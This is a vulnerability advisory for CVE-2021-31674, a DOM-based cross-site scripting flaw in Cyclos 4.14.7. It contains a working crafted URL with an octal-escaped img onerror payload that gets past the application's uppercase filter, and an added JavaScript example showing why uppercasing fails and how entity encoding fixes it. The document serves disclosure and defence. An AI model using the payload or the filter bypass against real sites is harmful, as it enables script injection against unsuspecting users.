Cyclos 4.14.7 - Dom-based Cross-Site Scripting in undefined enum (CVE-2021-31674)


CVE-2021-31674

Date: 18/04/2021

Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services

Vendor Homepage: https://www.cyclos.org/

Affected Version(s): Cyclos 4.14.7 (and prior)

Description: Cyclos 4 PRO 4.14.7 and before does not validate user input in the error message shown for an undefined enum value, which allows a remote unauthenticated attacker to execute JavaScript code via an undefined enum.

Steps to reproduce: An attacker sends a crafted URL [IP]/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to the victim. When the victim opens the URL, the XSS is triggered.

Note

When a non-existent enum value is entered, the error message is displayed together with the supplied value; however, the value is first passed through an uppercase() function.

As we know, if alert() is written in capitals (ALERT()) no popup appears.

Therefore we can write alert() in JSFuck form and then encode it with octal escapes to keep the payload short. Final payload: <img src=x onerror="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)">
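To show why the uppercase() step in the note is not an output encoding and what the fix looks like, here is an added JavaScript example (not code from the advisory or from Cyclos): it runs the payload quoted above through an uppercasing filter, decodes the octal escapes to show the handler body is untouched, and then applies a real HTML entity encoding. The function names and the assumption that the message is written into the page via innerHTML are mine.

```javascript
// Added example: why uppercasing user input is not an XSS defence, and what is.
// Function names below are illustrative, not Cyclos code.

// Constructed sample: the octal-escaped payload quoted in the write-up.
const PAYLOAD = String.raw`<img src=x onerror="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)">`;

// Models the weak transformation the error message applies to the value.
function weakUppercaseFilter(value) {
  return value.toUpperCase();
}

// Decodes JS octal escapes (\141 -> 'a') the way the engine would when it
// parses the string literals inside the onerror handler. Used here only to
// inspect what the browser would end up executing.
function decodeOctalEscapes(s) {
  return s.replace(/\\([0-7]{1,3})/g, (_, oct) => String.fromCharCode(parseInt(oct, 8)));
}

// Proper output encoding for an HTML element or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Returns true when the uppercased text still carries a live handler whose
// string literals decode back to the original identifiers.
function uppercaseLeavesHandlerIntact(value) {
  const shown = weakUppercaseFilter(value);   // <IMG SRC=X ONERROR="...">
  const decoded = decodeOctalEscapes(shown);
  // HTML tag and attribute names are case-insensitive, and the octal escapes
  // contain only backslashes and digits, which toUpperCase() does not touch.
  return /<IMG[^>]*ONERROR=/.test(shown) && decoded.includes("['alert'](1)");
}

// Returns true when the encoded text can no longer open a tag or attribute.
function encodingNeutralisesMarkup(value) {
  return !/[<>"]/.test(escapeHtml(value));
}

console.log('uppercase filter defeated:', uppercaseLeavesHandlerIntact(PAYLOAD)); // true
console.log('entity encoding safe     :', encodingNeutralisesMarkup(PAYLOAD));    // true
// In the DOM the equivalent fix is element.textContent = value instead of
// element.innerHTML = value, which needs no encoding step at all.
```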